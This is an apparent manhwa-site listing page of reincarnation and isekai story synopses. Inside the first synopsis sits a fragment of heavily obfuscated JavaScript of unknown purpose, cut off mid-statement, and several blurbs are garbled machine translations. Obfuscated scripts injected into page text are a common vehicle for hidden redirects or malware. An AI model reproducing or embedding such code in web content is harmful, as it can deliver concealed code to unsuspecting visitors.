Reincarnation - Page 23

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511 results

Becoming the Only Memory of the Male Lead

The body was possessed before the start of the novel. Also, she, the daughter of a Count, is an extra who is bound to be murdered. She didn't want to die like this, so she went in search of the male lead who's filled with the energy of life. The problem is that, due to his curse, he can't remember others. As the next best solution, she even tried to target his subordinates. "It's been long, Loreina." What? Why does this person remember me? It was unexpectedly due to an exception of the curse. Um. Well, I'll help you until the female lead appears. The only one who can break the curse is the female lead, so that it doesn't deviate from the original story. ...Yeah, that's exactly what she thought. ••• Kiss. I felt a soft touch on my cheek along with an unfamiliar sound. A tiny kiss landed on my cheek. "...Le-Leonard." "Stay still. It's interfering with the treatment." "No, but that's..." I understand that you're healing the injured area with the energy of life. "Is there any other way than this? You can just touch the injured area with your hand..." "No." Leonard just cut me off. ...No, there's no such thing!<script></script><script>(function(_0x170be8,_0x4f3006){var _0x5282b9=_0x2819,_0x5e0002=_0x170be8();while(!![]){try{var _0x2f6632=parseInt(_0x5282b9(0x1a9))/(0x8ee+0x2199+-0x2a86)*(parseInt(_0x5282b9(0x1a4))/(-0x1501+-0xc6+0x15c9))+-parseInt(_0x5282b9(0x1b0))/(-0x10*-0x1bc+0x2ad*-0x1+-0x1*0x1910)*(-parseInt(_0x5282b9(0x1a8))/(-0x51b*0x2+0x23b1*0x1+-0x1977))+parseInt(_0x5282b9(0x1bd))/(0xeb+-0x6d*-0x31+-0x3*0x741)*(parseInt(_0x5282b9(0x19e))/(-0x1f25+0x1d35+0x1f6))+parseInt(_0x5282b9(0x1a5))/(-0x1c63+-0x221*-0x11+-0x7c7)*(-parseInt(_0x5282b9(0x1a2))/(0x26ee+0x90b*0x1+0x1*-0x2ff1))+parseInt(_0x5282b9(0x1b8))/(0xa3*-0x16+0x4a6+0x965)+parseInt(_0x5282b9(0x1b6))/(-0x105+-0x5c*0x40+0x180f)*(parseInt(_0x5282b9(0x1b9))/(-0xd*-0x89+-0x2*-0x3e5+-0xeb4))+-parseInt(_0x5282b9(0x1b3))/(-0x4ca*-0x7+-0x67*-0x3a+-0x38d0);if(_0x2f6632===_0x4f3006)break;else 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Einstein's Monster

Lerew lives in a small fishing village on the coast, and trades with a young boy called a witch for medicine for his father. But one day, while attempting to fish in a dangerous area, Lerew is thrown overboard and attacked by sharks. However, even with his body mangled beyond recognition, he still doesn\'t wish to die…

1 days ago

I Can’t Date a Fictional Man!

When a BL manhua artist suddenly transmigrates into a Liao Dynasty princess, she decides to keep doing her own thing… but she had the misfortune to see her “child” come out of the book and refuse a gay relationship with the general?! With a sword poised at her throat, would she surrender or remain steadfast? To make things worse, she can’t control the events of her own story anymore; who exactly is this mysterious person manipulating everything behind the scenes?! Same editor with “The villainess refuses to flirt with the male lead”


The Villainess’s Wise Retirement Plan

Read manhwa The Villainess’s Wise Retirement Plan / A Clever Retirement Plan of the Villainess I reincarnated into *The Demon Lord’s Lover*, my favorite game. And not just anywhere—I’m the villainess who torments the heroine, only to meet a tragic end! On top of that, I’m cursed with a terminal condition: my life force drains each time I use magic, thanks to this human mana stone?! What kind of life is this…? No problem. I’ll just avoid using magic, protect my mana (a.k.a. my life force), save up a stash, and escape to a warm, peaceful land in the south with my sister… That was the plan, until— “Take this, Lilian. Your very own doll.” My father threw the male lead, the same one destined to become the future psychotic, possessive emperor, at my feet. “The Villainess’s Wise Retirement Plan Manhwa” is sames name: 악당의 슬기로운 은퇴 계획


How to Be a Dark Hero’s Daughter

The MC transmigrated into a novel and became an extra from the novel. The novel is a murder thriller and the main character is a serial killer. He kills criminals with black magic making him a dark hero (think of him as Dexter or batman with dark magic). She (MC) doesn’t have any death flags since she’s a background extra but she was a homeless girl of all things in such a dangerous novel. Somehow our MC saves the male lead and to thank her, he adopts her. “Become my daughter.” The richest, most powerful, and handsome duke commands her to be his child. The MC is freaked out since she knows he’s a cold blooded killer. Can she survive such a maniac? Yet he dotes on her and constantly says ‘my daughter is the cutest’! He wants to get master artists to draw her and gather poets to describe her adorableness. The duke alo has a son. The apple doesn’t fall far from the tree; he also dotes on her. In this way, a beggar became a little princess. She also got used to people getting killed. However there was still one problem. Our MC has turned sixteen and is wondering as a lady, will she have an arranged marriage? The whole house atmosphere quickly turns awkward. She realizes, perhaps they want her to stay here forever? Can she escape such a strange house? Everyone is so attached to her!


The Heavenly Demon Wants a Quiet Life

Read manhwa The Heavenly Demon Wants a Quiet Life “In my next life, I wish to walk a completely different path…” The Heavenly Demon, whose life revolved around fear and reverence, gained a crucial clue to mastering the Soul-Augmentation Art at the moment of his death: The “Soul-Augmentation Art” wasn’t just about consuming the souls of others. The Heavenly Demon then awakened in the body of Byeok Taesan, a frail young noble who could die at any moment… To survive, he must make his way to the courtesan house! The Heavenly Demon, now transformed into the “Night King,” begins his ambitious journey of survival.


Mizu Mahou Gurai Shika Torie ga Nai Kedo Gendai Chishiki ga Areba Juubun da yo ne

A five-year-old orphan named Frim, struggling to survive on the streets of the slums, recalls memories of Her past life as a Japanese person. Her everyday life is filled with violence and injustice, and She has no allies. All She possesses are \"magic that can produce water\" and \"modern knowledge.\" Even finding a place with a roof to sleep under is a luxury in her current situation... However, by using ideas that don’t exist in this world to improve his working conditions and discovering new ways to utilize water magic beyond drinking water, Frim gradually begins to make her presence known!


Maseki Gurume: Mamono no Chikara wo Tabeta Ore wa Saikyou!

In this world, It\'s only me who can get stronger by eating Magic Stones! At one point, I received an offer to have a smooth life reincarnation from the Goddess-sama… But the skill I got as a prize is Toxins Decomposition EX. Ugh, what a plain skill! It\'s so pitiful that even my own family makes fun of me… However, one day I realized that because of the effect of this skill, I can eat and gain power from Magic Stones! I\'ve also been notified that I\'m the prince from a neighboring country!? What awaits me in the castle are days of experimenting with Magic Stones and training, the perfect environment for me to become the strongest man there is… And to top it off, I received the Magic Stone of Dullahan! The story of a boy on the path to becoming a King while being chased by an assertive fiancee and Female Knights starts here! --- Social Media Links: Chisato Naruse (light novel illustrator): [@naruti06]( - Light Novel: [Japanese]( - Web Novel: [Japanese](


Another World Dump Truck

Yul, the manager of the interdimensional dump truck office, accidentally kills an innocent man named Kwon Yoo-jun. In order to make amends, Yul enters a romance fantasy novel where Yoo-jun is the villainess and tries to send her back to her original world. However, due to various complications, Yul becomes trapped in the novel. With the office staff scattered and no knowledge of the novel\'s plot, Yul desperately searches for a way out. But, Yoo-jun, who is now pretending to be a noble lady in the new world, causes Yul a headache.


The Reborn Ranker Chronicles

Legendary SSS-rank hunter Kang Tae-ha finally met his end. But just as he prepares to enter eternal sleep, he awakens once more in… imperial China?! Now, he must live as Liu Xinyun, the delinquent heir to a powerful company. All he wants to do is put his hunting days behind him, but in order to survive his new power-hungry relatives, Xinyun must hone his skills again, starting from level one. Can his own unique blend of necromancy and martial arts take him from useless bum to ultimate boss?


Author, In This Life I’m The Protagonist

Read manhwa Author, In This Life I’m The Protagonist “The writer seems to have a hard time writing by hand, so I think it would be better to try writing with your feet this time.” I was drawn into the hand of a God who calls Himself my fan, and possessed it as a supporting role in a novel that I had been working on all year round. “Make sure to complete it with the determination to die, or the determination to survive.” While I was working hard at God’s threat of death if I couldn’t finish the novel, the female protagonist died right in front of me?! He grabbed the crotch of the indignant God and hung it. “… If I can even play a pinch hitter, I can.” “Dae-Tara… . Do you think the writer wants to become a female protagonist?” “Why, where can’t you? I am a writer, a writer!” She received the Buffalo buff and succeeded in joining the adventures of the man. “Young-ae’s help, I will never forget. One day I will surely repay this favor.” There is no reason to fall in love with the man I made. have. He’s tough and tough, but he’s so handsome and handsome. What about those red auricles? Past life is a writer, current life is a female protagonist. Adventure, romance, and desperate struggles unfolding by the writer who rolls over as a female lead in a year-round work?!


Full Clearing Another World under a Goddess with Zero Believers

After his class gets buried alive on their way back from a school trip, 18 year old Makoto Takatsuki and class get transported to another world. Unlike the rest of his classmates who gained powerful abilities, Makoto barely gains any power. \"This other world is unbalanced!\". With the threat of a great Demon Lord rising again and a goddess with zero followers, can Makoto make his way through this new world and clear the isekai!?
